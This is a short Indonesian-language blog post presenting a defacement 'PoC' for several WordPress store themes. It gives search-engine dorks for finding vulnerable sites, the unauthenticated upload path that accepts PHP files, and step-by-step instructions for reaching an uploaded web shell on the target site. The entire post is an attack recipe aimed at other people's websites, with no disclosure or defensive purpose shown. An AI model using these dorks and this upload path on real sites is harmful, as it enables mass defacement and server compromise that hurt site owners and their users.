Deface Poc Wp-Store Themes Uploader
Friday, February 14, 2020
Edit
Dork: inurl:/wp-content/themes/eShop/
inurl:/wp-content/themes/WPStore/
inurl:/wp-content/themes/Store/
Exploit: site.com/wp-content/themes/WPStore/upload/
Upload ext: php, html, txt
Cara akses shellnya masukkan wp-content/uploads/products_img/namashell.php setelah alamat web target.
Example: site.com/wp-content/themes/WPStore/upload/
menjadi
site.com/wp-content/uploads/products_img/namashell.php
*nama shell diganti dengan nama shell kamu.